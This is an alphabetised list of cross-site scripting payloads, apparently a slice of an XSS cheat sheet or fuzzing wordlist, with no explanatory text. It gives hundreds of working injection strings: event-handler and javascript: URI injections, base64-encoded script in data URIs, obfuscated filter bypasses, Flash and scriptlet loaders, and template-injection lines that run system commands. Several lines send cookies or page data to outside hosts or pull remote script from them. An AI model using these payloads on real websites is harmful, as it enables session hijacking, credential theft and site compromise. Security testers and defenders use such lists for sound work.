- <NeatHtmlReplace_EMBED SRC_NeatHtmlReplace=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess_NeatHtmlReplace=”always”></NeatHtmlReplace_EMBED>
- <NeatHtmlReplace_EMBED SRC_NeatHtmlReplace=”http://ha.ckers.org/xss.swf" AllowScriptAccess_NeatHtmlReplace=”always”></NeatHtmlReplace_EMBED>
- <NeatHtmlReplace_FRAMESET><NeatHtmlReplace_FRAME SRC_NeatHtmlReplace=”javascript:alert(‘XSS’);”></NeatHtmlReplace_FRAMESET>
- </NeatHtmlReplace_HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4-
- <NeatHtmlReplace_HEAD><NeatHtmlLt /><META HTTP-EQUIV=”CONTENT-TYPE” CONTENT=”text/html; charset=UTF-7">
- <NeatHtmlReplace_HTML xmlns:xss_NeatHtmlReplace=”xmlns:xss”>
- <NeatHtmlReplace_IFRAME SRC_NeatHtmlReplace=”javascript:alert(‘XSS’);”></NeatHtmlReplace_IFRAME>
- <NeatHtmlReplace_INPUT TYPE=”IMAGE” SRC_NeatHtmlReplace=”javascript:alert(‘XSS’);”>
- <NeatHtmlReplace_LAYER SRC_NeatHtmlReplace=”http://ha.ckers.org/scriptlet.html"></NeatHtmlReplace_LAYER>
- <NeatHtmlReplace_LINK REL=”stylesheet” HREF=”http://ha.ckers.org/xss.css">
- <NeatHtmlReplace_LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
- <NeatHtmlReplace_OBJECT classid=”clsid:ae24fdae-03c6–11d1–8b76–0080c744f389"><NeatHtmlReplace_param name=”url” value=”javascript:alert(‘XSS’)”></NeatHtmlReplace_OBJECT>
- <NeatHtmlReplace_OBJECT TYPE=”text/x-scriptlet” DATA_NeatHtmlReplace=”http://ha.ckers.org/scriptlet.html"></NeatHtmlReplace_OBJECT>
- </NeatHtmlReplace_STYLE><A CLASS=”XSS”></A>
- <NeatHtmlReplace_STYLE>BODY{-moz-binding:url(“http://ha.ckers.org/xssmoz.xml#xss")}</NeatHtmlReplace_STYLE>
- <NeatHtmlReplace_STYLE>@import’http://ha.ckers.org/xss.css';</NeatHtmlReplace_STYLE>
- <NeatHtmlReplace_STYLE>@im\port’\ja\vasc\ript:alert(“XSS”)’;</NeatHtmlReplace_STYLE>
- <NeatHtmlReplace_STYLE>li {list-style-image:url(“javascript:alert(‘XSS’)”);}</NeatHtmlReplace_STYLE><UL><LI>XSS
- <NeatHtmlReplace_STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</NeatHtmlReplace_STYLE>
- <NeatHtmlReplace_STYLE TYPE=”text/javascript”>alert(‘XSS’);</NeatHtmlReplace_STYLE>
- <NeatHtmlReplace_STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}
- <NeatHtmlReplace_TABLE><NeatHtmlParserReset s=’’ d=”” /><script></script><TD BACKGROUND_NeatHtmlReplace=”javascript:alert(‘XSS’)”>
- </NeatHtmlReplace_TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
- <NeatHtmlReplace_XML ID=”I”><NeatHtmlReplace_X>
- <NeatHtmlReplace_XSS STYLE_NeatHtmlReplace=”behavior:url(xss.htc);”>
- <NeatHtmlReplace_XSS STYLE_NeatHtmlReplace=”xss:expression(alert(‘XSS’))”>
- <NeatHtmlReplace_xss:xss>XSS</NeatHtmlReplace_xss:xss> </NeatHtmlReplace_HTML>
- (new Array).filter.constructor(‘alert(1)’)()
- new class extends class extends class extends class extends alert(1){}{}{}{}
- new Function`al\ert\`6\``;
- new Function(location.search.slice(1))();
- new Image().src=”http://xssor.io/phishing/cookie.asp?cookie="+escape(document.cookie);
- &newLine;javascript:alert(1)
- new new new new new`${alert(1)}`
- new new new new new alert`1`
- new XMLHttpRequest().open(“GET”, “data:text/html,<svg onload=confirm(2)></svg>”, false);
- <noembed><img src=”</noembed><iframe onload=alert(1)>” /></noembed>
- </noscript><br><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code>
- <noscript><! — </noscript><img src=xx:x onerror=alert(1) →
- <noscript><noscript></noscript><script>confirm(1)</script></noscript>
- null%22%20style%3d%22background%3aexpression%28confirm%282727%29
- o={1.e+1111(){alert(arguments.callee);}};o[1e1111]()//
- o={1.e+1111(){alert(arguments.callee);}};o[1e1111]()
- <object%20allowscriptaccess=always>%20<param%20name=code%20value=http://renwa.tk/xss.swf>
- <object allowscriptaccess=always>
- <object allowscriptaccess=”always” data=”test.swf”></object>
- Object.bind(null,alert)()(1)
- <object classid=”clsid:02BF25D5–8C17–4B23-BC80-D3488ABDDC6B” onqt_error=”alert(1)” style=”behavior:url(#x);”><param name=postdomevents /></object>
- <object classid=”clsid:02BF25D5–8C17–4B23-BC80-D3488ABDDC6B” onqt_error=”javascript:alert(1)” style=”behavior:url(#x);”><param name=postdomevents /></object>
- <OBJECT CLASSID=”clsid:333C7BC4–460F-11D0-BC04–0080C7055A83"><PARAM NAME=”DataURL” VALUE=”javascript:alert(1)”></OBJECT>
- <OBJECT CLASSID=”clsid:333C7BC4–460F-11D0-BC04–0080C7055A83"><PARAM NAME=”DataURL” VALUE=”javascript:alert(1)”></OBJECT><;OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389>;<;param name=url value=javascript:alert(‘;XSS’;)>;<;/OBJECT>;
- <;OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389>;<;param name=url value=javascript:alert(‘;XSS’;)>;<;/OBJECT>;
- <OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><param name=url value=javascript:alert(‘XSS’)></OBJECT>
- <OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><param name=url value=javascript:alert(XSS)></OBJECT>
- <OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><paramname=url value=javascript:alert(‘XSS’)></OBJECT>
- <OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><param name=url value=javascript:confirm(document.location)></OBJECT>
- <OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><param name=url value=javascript:document.vulnerable=true></object>
- <OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
- <OBJECT classid=clsid:…” codebase=”javascript:alert(‘XSS’);”>
- <object classid=”clsid:…” codebase=”javascript:document.vulnerable=true;”>
- <object data=//0me.me/demo/xss/xssproject.swf?js=alert(document.domain);allowscriptaccess=always></object>
- <object data=//0me.me/demo/xss/xssproject.swf?js=alert(document.domain); allowscriptaccess=always></object> // Soroush Dallili
- <object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
- <object data=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==”type=”image/svg+xml”></object>
- <object data=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB 4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy 8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml”></object> // Firefox only
- <object data=”data:text/html;base64,%(base64)s”>
- <object data=’data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4=’ /src>
- <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik></object>
- <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
- <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
- ><object data=’data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4=’></object>”
- “\”\/><object data=’data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4=’></object>”
- <object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>
- <object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=”>
- <object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=”> // Firefox only
- <object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgvaW5zaWdodC1sYWJzLyk8L3NjcmlwdD4=”>
- <object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”>
- <object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></object>
- <object+data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></object>
- <object data=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+></object>
- <object data=’data:text/xml,<script xmlns=”http://www.w3.org/1999/xhtml “>confirm(1)</script>>’>
- <object/data=//goo.gl/nlX0P>
- <object/data=//goo.gl/nlX0P?
- <object/data=��//goo.gl/nlX0P��>
- <object data=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
- <object data=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
- “><object data=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
- <OBJECT data=http://xss.ha.ckers.org width=400 height=400 type=text/x-scriptlet”>
- <object data=”javascript:alert(0)”>
- <object+data=”javascript:alert(0)”>
- <object data=”javascript:alert(1)”>
- <object data=javascript:alert(1)> *
- <object data=javascript:alert(1)>
- <object data=javascript:alert(1)>
- <object data=javascript:alert(172)>
- <object data=”javascript:alert(1)”> // FF <object/data=”javascript:alert(1)”> // FF <object data=”javascript:alert(1)”>
- <object data=”javascript:alert(document.domain)”>
- <object data=”javascript:alert(XSS)”>
- <object/data=”javascript:alert(1)”>
- <object data=javascript:\u0061le%72t(1)>
- <object data=javascript:\u0061le%72t(1)>
- “/><object data=javascript:\u0061le%72t(1)>
- <object data=?p=%253Csvg/o%256Eload%253Dalert(1)%253E>
- <object data=//pkav/test.swf><param name=movie value=//pkav/test.swf><param name=allowscriptaccess value=always></object>
- <object data=”javascript:alert(1)”>
- <object data=”javascript:ale&# x72;t(1)”>
- <object data=”javascript:alert(1)”>
- Object.defineProperties(window,{‘location’:{value:’javascript:alert(1)’}})
- Object.defineProperty(location,’href’,{writable:false})
- <object id=”x” classid=”clsid:CB927D12–4FF7–4a9e-A169–56E4B8A75598"></object>
- <object id=”x” classid=”clsid:CB927D12–4FF7–4a9e-A169–56E4B8A75598"></object> <object classid=”clsid:02BF25D5–8C17–4B23-BC80-D3488ABDDC6B” onqt_error=”javascript:alert(1)” style=”behavior:url(#x);”><param name=postdomevents /></object>
- [Object[“keys”](this)[146]](1)
- [Object[“keys”](this)[5]](1)
- <object onafterscriptexecute=confirm(0)>
- <object onbeforeload object onbeforeload=”javascript:javascript:alert(1)”></object onbeforeload>
- <object onbeforescriptexecute=confirm(0)>
- <object onerror=alert(1)>
- <object onerror=javascript:javascript:alert(1)>
- <object onError object onError=”javascript:javascript:alert(1)”></object onError>
- <object onfocus=popup=1;>
- <object><param name=”src” value=
- <object><param name=”src” value=”javascript:alert(0)”></param></object>
- Object.prototype[Symbol.toStringTag]=’<svg/onload=alert(1)>’;location=’javascript:1+{}’
- Object.prototype[Symbol.toStringTag]=’<svg/onload=alert(1)>’;while(1){}location=’javascript:1+{}’
- /* →]]>%>?></object></script></title></textarea></noscript></style></xmp>’-/”///><img id=”b1" src=1 onerror=’$.getScript(“http://xss.cx.js", function() { c(); });’>’
- <object src=1 href=1 onerror=”javascript:alert(1)”></object>
- <object type=’text/x-html’ data=’javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x’></object>
- “<object type=’text/x-html’ data=’javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x’></object>”
- “><object type=’text/x-html’ data=’javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x’></object>”,
- “/><object type=’text/x-html’ data=’javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x’></object>
- <OBJECT TYPE=”text/x-scriptlet” DATA=”http://hacker.com/xss.html">
- <;OBJECT TYPE=”;text/x-scriptlet”; DATA=”;http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>;
- <OBJECT TYPE=”text/x-scriptlet” DATA=”http://ha.ckers.org/scriptlet.html"></OBJECT>
- <OBJECT TYPE=”text/x-scriptlet” DATA=”http://ha.ckers.org/scriptlet.html"></OBJECT>
- <object type=”text/x-scriptlet” data=”http://jsfiddle.net/XLE63/ “></object>
- “/><object type=”text/x-scriptlet” data=”http://jsfiddle.net/XLE63/ “></object>
- <OBJECT TYPE=”text/x-scriptlet” DATA=”http://www.securitycompass.com/scriptlet.html"></object>
- <OBJECT TYPE=”text/x-scriptlet” DATA=”http://xss.cx/scriptlet.html"></OBJECT>
- <OBJECT TYPE=”text/x-scriptlet” DATA=”http://xxxx.com/scriptlet.html"></OBJECT>
- <OBJECT TYPE=”text/x-scriptlet” DATA=”%(scriptlet)s”></OBJECT>
- * {-o-link:’javascript:alert(1)’;-o-link-source: current;}
- /”onafterscriptexecute=alert(‘XSS’) 1=’
- “ onblur=alert(1) autofocus a=”
- “onblur=alert(1)autofocusa=”
- onblur=alert(1) autofocus a=
- “ onblur=alert(XSS) “> <”
- “onBlur=”alert('XSS')”
- _.once(alert(9))
- onclick=’addUser(“23")-alert(1)//”)’
- onclick=’addUser(“23")alert(1)//”)’
- (/* */oNcliCk=alert() )
- “onclick=alert(1)//
- onclick=alert(1)
- ‘“/onclick=’alert(1)’/accesskey=’X’
- “ onclick=alert(1)//<button ‘ onclick=alert()//>
- onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
- “ onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
- “ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
- �� onclick=alert(1)//<button �� onclick=alert(1)//> */ alert(1)//
- onclick=alert(1)//<button �� onclick=alert(1)//> */ alert(1)//
- “ onclick=alert(1)//”>click
- “ onclick=alert()//<button ‘ onclick=alert()//> */ alert()//<img style=”background-url=eval(onclick)” onclick=alert()>//>
- onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>/*click me!#*/alert(1)
- “ onclick=alert(XSS) “>
- “onclick=”alert(‘XSS’)”
- onclick=”delFeedback(‘2&apos)alert(1)//’)”
- onclick=”elements[0].value=’<a/href=’%2BURL%2B’>link</a>’;submit()”>
- onclick=”elements[0].value=’<a/href=’%2BURL%2B’>link</a>’;submit()”
- onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);
- onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>”
- “onContextMenu=”alert('XSS')”
- “onCopy=”alert('XSS')”
- “oncut=alert(1)
- “onDblClick=”window[‘aleraaaat’.replace(‘aaaa’,’’)](‘XaaaaSaaaaS’.replace(‘aaaa’,’’).replace(‘aaaa’,’’))”
- ‘/(ondblclick|onclick|onkeydown|onkeypress|onkeyup|onmousedown|onmousemove|onmouseout|onmouseover|onmouseup|onload|onunload|onerror)=[^<]*(?=\>)/Uis’,
- “+onDblClick=prompt(123)”+
- ?onend=javascript:alert(1)//”,
- onerror%3Deval%3Bthrow’%3Dalert%5Cx281%5Cx29'%3B
- “onerror=alert(1)//
- ‘onerror=’alert(‘XSS’)’ a=’.jpg
- ;onerror=confirm;throw 1;
- onerror=confirm;throw 1;
- onerror=’eval(atob(“cHJvbXB0KDEpOw==”))’>
- onerror=eval;throw’=confirm\x281\x29';
- “+onError=prompt(123)”+
- one={{set(‘_factoryArgs.0’,’script’)}}
- “ onfocus=alert(document.domain) “> <”
- “ onfocus=alert(document.domain) “> <”
- “ onfocus=alert(XSS) “> <”
- “ onfocusin=alert(1) autofocus x=”
- “onfocusin=alert(1)autofocus x=”
- onfocusin=alert(1) autofocus x=
- “onfocusin=”top[‘\x61\x6C\x65\x72\x74’](‘\x58\x53\x53’)”
- onfocus=JaVaSCript:alert(123) autofocus
- ‘ onfocus=JaVaSCript:alert(123) autofocus
- “ onfocus=JaVaSCript:alert(123) autofocus
- onfocus=location=window.name//'
- “ onfocusout=alert(1) autofocus x=”
- “onfocusout=alert(1)autofocus x=”
- onfocusout=alert(1) autofocus x=
- “onfocusout=”parent[String.fromCharCode(500–403,500–392,500–399,500–386,500–384)](String.fromCharCode(300–212,300–217,300–217))”
- “+onfocus=”prompt(1)”+
- “ onfocus=prompt(1) autofocus fragment=”
- “onfocus=”window[‘\141\154\145\162\164’](‘\130\123\123’)”
- “ onfocus=”write(unescape(‘<’)+’script src=’+unescape(‘"http://’)
- “ onhover=”javascript:alert(-1)”
- “onKeyDown=”parent[‘aleraaaaat’.replace(‘aaaaa’,’’)](‘XaaaaaSaaaaaS’.replace(‘aaaaa’,’’).replace(‘aaaaa’,’’))”
- onkeydown=function(){ http://window.open ('//example.com/','_blank','a');}
- onkeydown=function(){ http://window.open (‘//example.com/’,’_blank’,’a’);
- onkeypress=function(){ http://window.open (‘about:blank’,’_blank’).close();}
- onkeypress=function(){ http://window.open (‘about:blank’,’_blank’).close();
- “+onkeypress=”prompt(23)”+
- “onload=”a=document.createElement(‘script’);a.setAttribute(‘src’,String.fromCharCode(104,116,116,112,58,47,47,109,97,108,101,114,105,115,99,104,46,110,101,116,47,97,46,106,115));document.body.appendChild(a)
- onload=alert(1)>
- ‘onload=alert(153)><svg/153=’
- ‘onload=alert(1)><svg/1=’
- onload=confirm(1)//
- onload=forms[0].submit()></iframe><form method=POST
- “onMouseDown=”alert('XSS')”
- “onMouseEnter=”alert('XSS')”
- “OnMouseEnter=”confirm()//
- onmouseenter=prompt(document.domain)
- “onMouseLeave=”alert('XSS')”
- “onMouseMove=”alert('XSS')”
- “onMouseOut=”alert('XSS')”
- onmouseover
- On Mouse Over
- “onmouseover=”alert(1)
- “onmouseover=alert(1)//
- “ onmouseover=”alert(4321)” blah=”
- “onmouseover=alert(77)//
- ‘ onmouseover=alert(/Black.Spook/)
- “ onmouseover=alert(XSS) “>
- “ onmouseover=”confirm(1)”style=”position:absolute;width:100%;height:100%;top:0;left:0;”
- ‘ onmouseover=confirm(document.location)
- onmouseover=”document.cookie=true;”>//INJECTX
- “onmouseover=”(new Function(‘rssseturn(alesssrt)’.split(‘sss’).join(‘’)))()((‘SXS’+’SXS’).slice(-5,4))”
- “ onmouseover=”prompt(0) x=”
- “onmouseover=”prompt(0)x=”
- onmouseover=prompt(100) bad=’
- onmouseover=prompt(document.domain
- “+onmouseover=”window.location=’http://localhost'
- “onMouseUp=”window[String.fromCharCode(501–404,501–393,501–400,501–387,501–385)]('XSS')”
- onreadystatechange=”alert(1)”>1</div>
- onreadystatechange=”alert(2)”>2</div>
- “+onReset=prompt(123)”+
- “onresize=prompt(1)>
- onscroll=alert(‘xss’)>
- “onSelect=”alert('XSS')”
- onxxx=yyy
- <o/onmouseover=o=prompt,o``>o
- open(c2.canvas.toDataURL())
- open(‘java’+’script:ale’+’rt(11)’);
- open`javascript:alert(1)//#${‘_self’}`
- open(name)
- open(‘’,’_self’).alert(1)
- Opera:<style>*{-o-link:’data:text/html,<svg/onload=alert(/@garethheyes/)>’;-o-link-source:current}</style><a href=1>aaa
- <option>’><button><img src=x onerror=confirm(0);></button></option>
- “<option>’><button><img src=x onerror=confirm(0);></button></option>”
- ><option>’><button><img src=x onerror=confirm(1);></button></option>
- “\”\/><option>’><button><img src=x onerror=confirm(1);></button></option>”,
- oscriptaalert(�FXSS�F)o/scripta
- “o<x>nmouseover=alert<x>(1)//
- o={x:’’+<s>eva</s>+<s>l</s>,y:’’+<s>aler</s>+<s>t</s>+<s>(1)</s>};function f() { 0[this.x](this.y) }f.call(o);
- <p/%0Aonmouseover%0A=%0Aconfirm(1)>renwax23
- p=%26p=%26lt;svg/onload=alert(1)><j onclick=location%2B=document.body.textContent>click me!
- ?page=javascript:alert(1)”
- p=-alert(1)}//\
- p=`-alert(1)”>’onload=”`<svg/1=’
- p=*/alert(1)”>’onload=”/*<svg/1=’
- p=*/alert(1)</script><script>/*
- p=>alert(1)</script><script/1=
- p=’>alert(1)</script><script/1=’
- ?param1=<script>prompt(9);/*¶m2=*/</script>
- /?param=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
- /?param=javascript:alert(document.cookie)
- <param name=url value=https://l0.cm/xss.swf>
- $.parseHTML(‘<img src=xx:X onerror=confirm(1)>’)
- parseInt(“confirm”,30) == 8680439 && 8680439..toString(30) == “confirm”
- parseInt(“prompt”,36);
- <path d=”M0,0" style=”marker-start:url(test4.svg#a)”/>
- PATH_INFO:/<link rel=import href=”/bypass/path/<script>alert(1)</script>”>
- <p class=”comment” title=”*/eval(y);/*” data-comment=’{“id”:1}’></p>
- <p class=”comment” title=””onload=’/*”></p>
- <p class=”comment” title=”*/prompt(1)’”></p>
- <p class=”comment” title=””><script>/*” data-comment=’{“id”:1}’></p>
- <p class=”comment” title=”*/</script>” data-comment=’{“id”:1}’></p>
- <p class=”comment” title=””><svg/a=”></p>
- <p class=”comment” title=”*/x[0]=’a’;/*” data-comment=’{“id”:1}’></p>
- <p class=”comment” title=”*/x[1]=’l’;/*” data-comment=’{“id”:1}’></p>
- <p class=”comment” title=”*/x[2]=’e’;/*” data-comment=’{“id”:1}’></p>
- <p class=”comment” title=”*/x[3]=’r’;/*” data-comment=’{“id”:1}’></p>
- <p class=”comment” title=”*/x[4]=’t’;/*” data-comment=’{“id”:1}’></p>
- <p class=”comment” title=”*/x[5]=’(‘;/*” data-comment=’{“id”:1}’></p>
- <p class=”comment” title=”*/x[6]=’1';/*” data-comment=’{“id”:1}’></p>
- <p class=”comment” title=”*/x[7]=’)’;/*” data-comment=’{“id”:1}’></p>
- <p class=”comment” title=”*/x=new Array();/*” data-comment=’{“id”:1}’></p>
- <p class=”comment” title=”*/y=x.join(‘’);/*” data-comment=’{“id”:1}’></p>
- p.coords.longitude+’,Altitude:’+p.coords.altitude);})
- perl -e 'print \”;<;IMG SRC=java\0script:alert(\”;XSS\”;)>;\”;;' >; out
- perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
- perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
- perl -e 'print \”;<;SCR\0IPT>;alert(\”;XSS\”;)<;/SCR\0IPT>;\”;;' >; out
- perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
- perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out
- perl -e ‘print “<IMG id=XSS SRC=java\0script:alert(\”XSS\”)>”;’ > out
- perl -e ‘print “<IMG />”;’ > out
- perl -e ‘print “<IMG SRC=java\0script:alert(“XSS”)>”;’> out
- perl -e ‘print “<IMG SRC=java\0script:alert(“XSS”)>”;’ > out
- perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
- perl -e ‘print \”<IMG SRC=java\0script:alert(\”XSS\”)>\”;’ > out
- perl -e ‘print “<IMG SRC_NeatHtmlReplace=”java\0script:alert(\"XSS\")”>”;’ > out
- perl -e ‘;print “;<;IM SRC=java\0script:alert(“;XSS”;)>”;;’;>; out
- perl -e ‘print \”<IMG SRC=java\0script:alert(\\”XSS\\”)>\”;’ > out
- perl -e ‘print \”<SCR\0IPT>alert(\\”XSS\\”)</SCR\0IPT>\”;’ > out
- perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
- perl -e ‘print “<NeatHtmlLt /><SCR\0IPT>alert(\”XSS\”)<NeatHtmlLt /></SCR\0IPT>”;’ > out
- perl -e ‘;print “;&;<;SCR\0IPT>;alert(“;XSS”;)<;/SCR\0IPT>;”;;’; >; out
- perl -e ‘print “<SCR\0IPT>alert(“XSS”)</SCR\0IPT>”;’ > out
- perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
- perl -e ‘print “&<SCR\0IPT>alert(“XSS”)</SCR\0IPT>”;’ > out
- perl -e ‘print \”<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>\”;’ > out
- ?pg=javascript:alert(1)”,
- <p hidden?={{hidden}}>123</p>
- PHNjcmlwdD5hbGVydCgnWFNTIScpPC9zY3JpcHQ+
- PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
- PHP a = val2
- <?php echo $_SERVER[‘PHP_SELF’]?>
- <?php header(“Access-Control-Allow-Origin: *”); ?>
- <?php header(��Access-Control-Allow-Origin: *��); ?>
- <?php header(Access-Control-Allow-Origin: *); ?>
- <?php header(‘content-type:text/html;charset=utf-7-utf-8-shift_jis’);?>
- phpmyadmin/js/canvg/flashcanvas.swf?id=test\));}catch(e){alert(document.domain)}//
- “><p/id=1%0Aonmousemove%0A=%0Aconfirm`1`>hoveme
- “><p id=””onmouseover=\u0070rompt(1) //
- <p id=”x”>AAA</p>
- <p id=x>javascrip<x>t:alert(<x>1)</p><math><a href=”#*/=x.innerText,a” xml:base=javascript:location/*>Click HERE
- <p id=x>javascrip<x>t:alert(<x>2)</p><math><a href=”#*/=x.innerText,a” xml:base=javascript:location/*>Click HERE
- <p><img class=”reference” contenteditable=”false” data-refid=”2" data-type=”reference” onerror=”eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))” src=”http://img.baidu.com/img/baike/editor/reference.gif" unselectable=”on” /></p>
- <p><img src=”https://attacker/?data=</p>
- p=<j%26p=<svg%2Bonload=alert(1) onclick=location%2B=outerHTML>click me!
- p=<j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)>
- p=<j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)>
- <pkav xmlns=”><iframe onload=alert(1)”>123</pkav>
- <plaintext>
- <plaintext/onmousemove=prompt(1)>renwa
- </plaintext\></|\><plaintext/onmouseover=prompt(1)
- ?playerID=a\”;))}catch(e){confirm(document.domain)}//
- ?playerready=alert(document.cookie)
- player.swf?playerready=alert(document.cookie)
- player.swf?tracecall=alert(document.cookie)
- plupload.flash.swf?%#target%g=alert&uid%g=XSS&
- <p onbeforescriptexecute=”alert(1)”><svg><script>\</p>
- <p/onclick=alert(/INJECTX/)>a
- <p oncut=alert(1)>A
- <p/oncut=alert(1)>A
- p=’onload=alert(1)><svg/1=’
- <p onmouseover=alert(/1/)>xxx</p>
- <p/onmouseover=javascript:alert(1); >M</p>
- {{[].pop.constructor(‘alert()’)()}}
- p=\&q=-alert(1)//
- preg_replace(/on\w+\s*=|\>/i, -, $_REQUEST[q]);
- preg_replace(/\<script|=/i, -, $_REQUEST[q]);
- prerequisite: \” => \\\”
- previousSibling.nodeValue, document.body.textContent*
- print ctx.eval(u”’\N{HEAVY BLACK HEART}’”)
- ${@print(system(a?whoamia?))}
- ${@print(system(��dir��))}
- ${@print(system($_SERVER[‘HTTP_USER_AGENT’]))}
- process.open(“/Applications/Calculator.app/Contents/MacOS/Calculator”);
- prompt(0x0064)
- ‘?prompt`1`?’
- ‘*prompt(1)*’
- p’rompt(1)
- prompt(1)-eval(JSON.parse(name).input)
- “(prompt(1))in”
